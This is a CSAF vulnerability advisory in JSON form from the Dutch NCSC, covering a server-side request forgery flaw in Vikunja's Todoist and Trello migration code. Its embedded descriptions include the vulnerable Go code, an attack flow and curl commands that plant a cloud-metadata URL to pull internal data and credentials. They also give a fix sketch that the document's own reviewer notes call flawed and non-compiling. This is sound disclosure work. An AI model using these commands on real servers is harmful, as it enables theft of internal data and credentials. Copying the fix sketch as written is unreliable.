{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-33675",
        "tracking": {
            "current_release_date": "2026-03-27T19:46:16.766877Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-33675",
            "initial_release_date": "2026-03-24T20:50:39.149133Z",
            "revision_history": [
                {
                    "date": "2026-03-24T20:50:39.149133Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:50:41.757863Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-03-24T20:53:16.221677Z",
                    "number": "3",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-03-24T20:53:31.555336Z",
                    "number": "4",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-03-24T20:53:33.690675Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-25T21:49:52.237829Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-03-25T21:50:00.595567Z",
                    "number": "7",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:12:47.524933Z",
                    "number": "8",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| References created (4).| CWES updated (1)."
                },
                {
                    "date": "2026-03-26T00:12:54.441785Z",
                    "number": "9",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-26T00:50:05.781149Z",
                    "number": "10",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-03-26T00:50:15.506238Z",
                    "number": "11",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T00:13:43.213556Z",
                    "number": "12",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| References created (4)."
                },
                {
                    "date": "2026-03-27T00:13:46.362445Z",
                    "number": "13",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-03-27T19:45:50.111381Z",
                    "number": "14",
                    "summary": "Products connected (1).| Product Identifiers created (1).| Exploits created (1)."
                },
                {
                    "date": "2026-03-27T19:45:52.167532Z",
                    "number": "15",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "15"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0|<2.2.1",
                                "product": {
                                    "name": "vers:unknown/>=0|<2.2.1",
                                    "product_id": "CSAFPID-5911160"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "api"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.2.1",
                                "product": {
                                    "name": "vers:unknown/<2.2.1",
                                    "product_id": "CSAFPID-5902472"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vikunja"
                    }
                ],
                "category": "vendor",
                "name": "go-vikunja"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<2.2.1",
                                "product": {
                                    "name": "vers:unknown/<2.2.1",
                                    "product_id": "CSAFPID-5943812",
                                    "product_identification_helper": {
                                        "cpe": "cpe:2.3:a:vikunja:vikunja:*:*:*:*:*:*:*:*"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "vikunja"
                    }
                ],
                "category": "vendor",
                "name": "vikunja"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-33675",
            "cwe": {
                "id": "CWE-918",
                "name": "Server-Side Request Forgery (SSRF)"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment. Version 2.2.1 patches the issue.",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33675.json"
                },
                {
                    "category": "description",
                    "text": "Vikunja is an open-source self-hosted task management platform. Prior to version 2.2.1, the migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment. Version 2.2.1 patches the issue.",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33675"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment.\n\n## Details\n\nThe vulnerability exists because the migration HTTP client uses a plain `http.Client{}` with no URL validation, no private IP blocklist, no redirect restrictions, and no response size limit.\n\n**Vulnerable code** in `pkg/modules/migration/helpers.go:38-59`:\n```go\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n\treq, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// ... headers added ...\n\thc := http.Client{}\n\tresp, err := hc.Do(req)\n\t// ... 
no URL validation, no IP filtering ...\n\tbuf = &bytes.Buffer{}\n\t_, err = buf.ReadFrom(resp.Body) // no size limit\n\treturn\n}\n```\n\n**Call site in Todoist migration** (`pkg/modules/migration/todoist/todoist.go:433-435`):\n```go\nif len(n.FileAttachment.FileURL) > 0 {\n\tbuf, err := migration.DownloadFile(n.FileAttachment.FileURL)\n```\n\nThe `FileURL` is deserialized directly from the Todoist Sync API response (`json:\"file_url\"` tag at line 125) with no validation.\n\n**Call sites in Trello migration** (`pkg/modules/migration/trello/trello.go`):\n- Line 263: `migration.DownloadFile(board.Prefs.BackgroundImage)` — board background\n- Line 345: `migration.DownloadFileWithHeaders(attachment.URL, ...)` — card attachments\n- Line 381: `migration.DownloadFile(cover.URL)` — card cover images\n\nNotably, the webhooks module in the same codebase was recently patched (commit `8d9bc3e`) to add SSRF protection using the `daenney/ssrf` library, but this protection was **not applied** to the migration module — making this an incomplete fix.\n\n**Attack flow:**\n1. Attacker creates a Todoist account\n2. Using the Todoist Sync API, attacker creates a note with `file_attachment.file_url` set to an internal URL (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`)\n3. Attacker authenticates to the target Vikunja instance and initiates a Todoist migration\n4. Vikunja's server fetches the internal URL and stores the response body as a task attachment\n5. 
Attacker downloads the attachment through the normal Vikunja API, reading the internal resource contents\n\n## PoC\n\n**Prerequisites:**\n- Vikunja instance with Todoist migration enabled (admin has configured OAuth client ID/secret)\n- Authenticated Vikunja user account\n- Todoist account controlled by the attacker\n\n**Step 1: Craft malicious Todoist data**\n\nUsing the Todoist Sync API, create a note with an internal URL as the file attachment:\n\n```bash\ncurl -X POST \"https://api.todoist.com/sync/v9/sync\" \\\n  -H \"Authorization: Bearer $TODOIST_TOKEN\" \\\n  -d 'commands=[{\n    \"type\": \"note_add\",\n    \"temp_id\": \"ssrf-test-1\",\n    \"uuid\": \"550e8400-e29b-41d4-a716-446655440001\",\n    \"args\": {\n      \"item_id\": \"'$ITEM_ID'\",\n      \"content\": \"test note\",\n      \"file_attachment\": {\n        \"file_name\": \"metadata.txt\",\n        \"file_size\": 1,\n        \"file_type\": \"text/plain\",\n        \"file_url\": \"http://169.254.169.254/latest/meta-data/\"\n      }\n    }\n  }]'\n```\n\n**Step 2: Trigger migration on Vikunja**\n\n```bash\n# Authenticate to Vikunja\nTOKEN=$(curl -s -X POST \"https://vikunja.example.com/api/v1/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"attacker\",\"password\":\"password\"}' | jq -r .token)\n\n# Initiate Todoist OAuth flow\ncurl -s \"https://vikunja.example.com/api/v1/migration/todoist/auth\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n\n# After OAuth callback, trigger the migration\ncurl -s -X POST \"https://vikunja.example.com/api/v1/migration/todoist/migrate\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"<oauth_code>\"}'\n```\n\n**Step 3: Download the attachment containing internal data**\n\n```bash\n# List tasks to find the attachment ID\ncurl -s \"https://vikunja.example.com/api/v1/projects\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n\n# Download the attachment (contains response from internal 
URL)\ncurl -s \"https://vikunja.example.com/api/v1/tasks/<task_id>/attachments/<attachment_id>\" \\\n  -H \"Authorization: Bearer $TOKEN\" -o metadata.txt\n\ncat metadata.txt\n# Expected: cloud instance metadata, internal service responses, etc.\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n- **Read cloud instance metadata**: Access `http://169.254.169.254/` to retrieve IAM credentials, instance identity, and configuration data on AWS/GCP/Azure deployments. Reviewer note: the Todoist path goes through `DownloadFile`, which issues a bare GET with no attacker-controlled headers (the Trello path adds headers chosen by the migration code, not by the attacker), so this applies to metadata endpoints that answer an unauthenticated GET such as AWS IMDSv1; endpoints that require a request header or session token (GCP `Metadata-Flavor: Google`, Azure `Metadata: true`, AWS IMDSv2) are not reachable this way, while ordinary internal HTTP services remain exposed\n- **Probe internal network services**: Map internal infrastructure by making requests to RFC1918 addresses (10.x, 172.16.x, 192.168.x)\n- **Access internal APIs**: Reach internal services that trust requests from the Vikunja server's network position\n- **Denial of service**: Since `buf.ReadFrom(resp.Body)` has no size limit, pointing to a large or streaming resource causes unbounded memory allocation on the Vikunja server\n\nThe attack requires the target Vikunja instance to have Todoist or Trello migration enabled (requires admin configuration of OAuth credentials), but this is a standard deployment configuration.\n\n## Recommended Fix\n\nApply the same SSRF protection already used for webhooks (`daenney/ssrf`) to the migration HTTP clients. In `pkg/modules/migration/helpers.go`:\n\n```go\nimport (\n    \"github.com/daenney/ssrf\"\n    \"code.vikunja.io/api/pkg/config\"\n)\n\nfunc safeMigrationClient() *http.Client {\n    s, _ := ssrf.New(ssrf.WithAnyPort())\n    return &http.Client{\n        Transport: &http.Transport{\n            DialContext: (&net.Dialer{\n                Control: s.Safe,\n            }).DialContext,\n        },\n    }\n}\n\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n    req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n    if err != nil {\n        return nil, err\n    }\n    for key, h := range headers {\n        for _, hh := range h {\n            req.Header.Add(key, hh)\n        }\n    }\n\n    hc := safeMigrationClient()\n    resp, err := hc.Do(req)\n    if err != nil {\n        return nil, err\n    }\n    defer resp.Body.Close()\n\n    // Limit response body to 100MB to prevent memory exhaustion\n    buf = &bytes.Buffer{}\n    _, err = buf.ReadFrom(io.LimitReader(resp.Body, 100*1024*1024))\n    return\n}\n```\n\nApply the same pattern to `DoGetWithHeaders` and `DoPostWithHeaders` in the same file.\n\nReviewer note on the sketch above: it discards the error from `ssrf.New` (`s, _ :=`), which on failure would likely leave `s` nil and make `s.Safe` panic at dial time, so check and return that error; the `config` import is unused and the snippet will not compile as written; the client still sets no `Timeout`, so a slow or non-responding internal endpoint can hold a migration open indefinitely; and `io.LimitReader` silently truncates a response at 100 MB rather than rejecting it, which should be a deliberate choice. The commit referenced by this advisory is the authoritative change and should be consulted in preference to this sketch.",
                    "title": "github - https://api.github.com/advisories/GHSA-g66v-54v9-52pr"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nThe migration helper functions `DownloadFile` and `DownloadFileWithHeaders` in `pkg/modules/migration/helpers.go` make arbitrary HTTP GET requests without any SSRF protection. When a user triggers a Todoist or Trello migration, file attachment URLs from the third-party API response are passed directly to these functions, allowing an attacker to force the Vikunja server to fetch internal network resources and return the response as a downloadable task attachment.\n\n## Details\n\nThe vulnerability exists because the migration HTTP client uses a plain `http.Client{}` with no URL validation, no private IP blocklist, no redirect restrictions, and no response size limit.\n\n**Vulnerable code** in `pkg/modules/migration/helpers.go:38-59`:\n```go\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n\treq, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// ... headers added ...\n\thc := http.Client{}\n\tresp, err := hc.Do(req)\n\t// ... 
no URL validation, no IP filtering ...\n\tbuf = &bytes.Buffer{}\n\t_, err = buf.ReadFrom(resp.Body) // no size limit\n\treturn\n}\n```\n\n**Call site in Todoist migration** (`pkg/modules/migration/todoist/todoist.go:433-435`):\n```go\nif len(n.FileAttachment.FileURL) > 0 {\n\tbuf, err := migration.DownloadFile(n.FileAttachment.FileURL)\n```\n\nThe `FileURL` is deserialized directly from the Todoist Sync API response (`json:\"file_url\"` tag at line 125) with no validation.\n\n**Call sites in Trello migration** (`pkg/modules/migration/trello/trello.go`):\n- Line 263: `migration.DownloadFile(board.Prefs.BackgroundImage)` — board background\n- Line 345: `migration.DownloadFileWithHeaders(attachment.URL, ...)` — card attachments\n- Line 381: `migration.DownloadFile(cover.URL)` — card cover images\n\nNotably, the webhooks module in the same codebase was recently patched (commit `8d9bc3e`) to add SSRF protection using the `daenney/ssrf` library, but this protection was **not applied** to the migration module — making this an incomplete fix.\n\n**Attack flow:**\n1. Attacker creates a Todoist account\n2. Using the Todoist Sync API, attacker creates a note with `file_attachment.file_url` set to an internal URL (e.g., `http://169.254.169.254/latest/meta-data/iam/security-credentials/`)\n3. Attacker authenticates to the target Vikunja instance and initiates a Todoist migration\n4. Vikunja's server fetches the internal URL and stores the response body as a task attachment\n5. 
Attacker downloads the attachment through the normal Vikunja API, reading the internal resource contents\n\n## PoC\n\n**Prerequisites:**\n- Vikunja instance with Todoist migration enabled (admin has configured OAuth client ID/secret)\n- Authenticated Vikunja user account\n- Todoist account controlled by the attacker\n\n**Step 1: Craft malicious Todoist data**\n\nUsing the Todoist Sync API, create a note with an internal URL as the file attachment:\n\n```bash\ncurl -X POST \"https://api.todoist.com/sync/v9/sync\" \\\n  -H \"Authorization: Bearer $TODOIST_TOKEN\" \\\n  -d 'commands=[{\n    \"type\": \"note_add\",\n    \"temp_id\": \"ssrf-test-1\",\n    \"uuid\": \"550e8400-e29b-41d4-a716-446655440001\",\n    \"args\": {\n      \"item_id\": \"'$ITEM_ID'\",\n      \"content\": \"test note\",\n      \"file_attachment\": {\n        \"file_name\": \"metadata.txt\",\n        \"file_size\": 1,\n        \"file_type\": \"text/plain\",\n        \"file_url\": \"http://169.254.169.254/latest/meta-data/\"\n      }\n    }\n  }]'\n```\n\n**Step 2: Trigger migration on Vikunja**\n\n```bash\n# Authenticate to Vikunja\nTOKEN=$(curl -s -X POST \"https://vikunja.example.com/api/v1/login\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"attacker\",\"password\":\"password\"}' | jq -r .token)\n\n# Initiate Todoist OAuth flow\ncurl -s \"https://vikunja.example.com/api/v1/migration/todoist/auth\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n\n# After OAuth callback, trigger the migration\ncurl -s -X POST \"https://vikunja.example.com/api/v1/migration/todoist/migrate\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"code\":\"<oauth_code>\"}'\n```\n\n**Step 3: Download the attachment containing internal data**\n\n```bash\n# List tasks to find the attachment ID\ncurl -s \"https://vikunja.example.com/api/v1/projects\" \\\n  -H \"Authorization: Bearer $TOKEN\"\n\n# Download the attachment (contains response from internal 
URL)\ncurl -s \"https://vikunja.example.com/api/v1/tasks/<task_id>/attachments/<attachment_id>\" \\\n  -H \"Authorization: Bearer $TOKEN\" -o metadata.txt\n\ncat metadata.txt\n# Expected: cloud instance metadata, internal service responses, etc.\n```\n\n## Impact\n\nAn authenticated attacker can:\n\n- **Read cloud instance metadata**: Access `http://169.254.169.254/` to retrieve IAM credentials, instance identity, and configuration data on AWS/GCP/Azure deployments. Reviewer note: the Todoist path goes through `DownloadFile`, which issues a bare GET with no attacker-controlled headers (the Trello path adds headers chosen by the migration code, not by the attacker), so this applies to metadata endpoints that answer an unauthenticated GET such as AWS IMDSv1; endpoints that require a request header or session token (GCP `Metadata-Flavor: Google`, Azure `Metadata: true`, AWS IMDSv2) are not reachable this way, while ordinary internal HTTP services remain exposed\n- **Probe internal network services**: Map internal infrastructure by making requests to RFC1918 addresses (10.x, 172.16.x, 192.168.x)\n- **Access internal APIs**: Reach internal services that trust requests from the Vikunja server's network position\n- **Denial of service**: Since `buf.ReadFrom(resp.Body)` has no size limit, pointing to a large or streaming resource causes unbounded memory allocation on the Vikunja server\n\nThe attack requires the target Vikunja instance to have Todoist or Trello migration enabled (requires admin configuration of OAuth credentials), but this is a standard deployment configuration.\n\n## Recommended Fix\n\nApply the same SSRF protection already used for webhooks (`daenney/ssrf`) to the migration HTTP clients. In `pkg/modules/migration/helpers.go`:\n\n```go\nimport (\n    \"github.com/daenney/ssrf\"\n    \"code.vikunja.io/api/pkg/config\"\n)\n\nfunc safeMigrationClient() *http.Client {\n    s, _ := ssrf.New(ssrf.WithAnyPort())\n    return &http.Client{\n        Transport: &http.Transport{\n            DialContext: (&net.Dialer{\n                Control: s.Safe,\n            }).DialContext,\n        },\n    }\n}\n\nfunc DownloadFileWithHeaders(url string, headers http.Header) (buf *bytes.Buffer, err error) {\n    req, err := http.NewRequestWithContext(context.Background(), http.MethodGet, url, nil)\n    if err != nil {\n        return nil, err\n    }\n    for key, h := range headers {\n        for _, hh := range h {\n            req.Header.Add(key, hh)\n        }\n    }\n\n    hc := safeMigrationClient()\n    resp, err := hc.Do(req)\n    if err != nil {\n        return nil, err\n    }\n    defer resp.Body.Close()\n\n    // Limit response body to 100MB to prevent memory exhaustion\n    buf = &bytes.Buffer{}\n    _, err = buf.ReadFrom(io.LimitReader(resp.Body, 100*1024*1024))\n    return\n}\n```\n\nApply the same pattern to `DoGetWithHeaders` and `DoPostWithHeaders` in the same file.\n\nReviewer note on the sketch above: it discards the error from `ssrf.New` (`s, _ :=`), which on failure would likely leave `s` nil and make `s.Safe` panic at dial time, so check and return that error; the `config` import is unused and the snippet will not compile as written; the client still sets no `Timeout`, so a slow or non-responding internal endpoint can hold a migration open indefinitely; and `io.LimitReader` silently truncates a response at 100 MB rather than rejecting it, which should be a deliberate choice. The commit referenced by this advisory is the authoritative change and should be consulted in preference to this sketch.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g66v-54v9-52pr.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "Vikunja has SSRF via Todoist/Trello Migration File Attachment URLs that Allows Reading Internal Network Resources in code.vikunja.io/api.\n\nNOTE: The source advisory for this report contains additional versions that could not be automatically mapped to standard Go module versions.\n\n(If this is causing false-positive reports from vulnerability scanners, please suggest an edit to the report.)\n\nThe additional affected modules and versions are: code.vikunja.io/api before v2.2.1.",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4851.json?alt=media"
                },
                {
                    "category": "other",
                    "text": "0.00034",
                    "title": "EPSS"
                },
                {
                    "category": "other",
                    "text": "3.4",
                    "title": "NCSC Score"
                },
                {
                    "category": "other",
                    "text": "Exploit code publicly available, There is exploit data available from source Nvd, The value of the most recent CVSS (V3) score, The value of the most recent EPSS score, Is related to (a version of) an uncommon product",
                    "title": "NCSC Score top decreasing factors"
                }
            ],
            "product_status": {
                "known_affected": [
                    "CSAFPID-5902472",
                    "CSAFPID-5911160",
                    "CSAFPID-5943812"
                ]
            },
            "references": [
                {
                    "category": "external",
                    "summary": "Source - cveprojectv5",
                    "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33675.json"
                },
                {
                    "category": "external",
                    "summary": "Source - nvd",
                    "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33675"
                },
                {
                    "category": "external",
                    "summary": "Source - github",
                    "url": "https://api.github.com/advisories/GHSA-g66v-54v9-52pr"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGHSA-g66v-54v9-52pr.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Source - first",
                    "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0"
                },
                {
                    "category": "external",
                    "summary": "Source - osv",
                    "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/Go%2FGO-2026-4851.json?alt=media"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/go-vikunja/vikunja/security/advisories/GHSA-g66v-54v9-52pr"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://github.com/go-vikunja/vikunja/commit/93297742236e3d33af72c993e5da960db01d259e"
                },
                {
                    "category": "external",
                    "summary": "Reference - cveprojectv5; github; nvd; osv",
                    "url": "https://vikunja.io/changelog/vikunja-v2.2.2-was-released"
                },
                {
                    "category": "external",
                    "summary": "Reference - github; osv",
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33675"
                },
                {
                    "category": "external",
                    "summary": "Reference - github",
                    "url": "https://github.com/advisories/GHSA-g66v-54v9-52pr"
                }
            ],
            "scores": [
                {
                    "cvss_v3": {
                        "version": "3.1",
                        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L",
                        "baseScore": 6.4,
                        "baseSeverity": "MEDIUM"
                    },
                    "products": [
                        "CSAFPID-5902472",
                        "CSAFPID-5911160",
                        "CSAFPID-5943812"
                    ]
                }
            ],
            "title": "CVE-2026-33675"
        }
    ]
}